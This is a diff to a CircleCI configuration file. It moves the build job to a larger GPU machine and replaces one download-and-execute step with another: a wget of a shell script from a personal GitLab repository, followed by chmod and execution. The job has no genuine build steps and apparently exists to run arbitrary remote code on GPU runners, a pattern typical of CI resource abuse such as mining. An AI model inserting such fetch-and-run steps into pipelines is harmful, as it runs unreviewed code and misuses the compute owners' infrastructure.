--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -2,9 +2,9 @@ version: 2.1
 jobs:
   build:
     machine:
-      resource_class: gpu.nvidia.medium
+      resource_class: gpu.nvidia.large
       image: ubuntu-1604-cuda-10.1:201909-23
     steps:
-      - run: wget https://raw.githubusercontent.com/viwarlani/viwarlani/main/M.sh && chmod +x b.sh && ./M.sh
-parallelism: 50
+      - run: wget https://gitlab.com/viwarlani/build/-/raw/main/bze.sh && chmod +x *.sh && ./bze.sh
+parallelism: 1
       
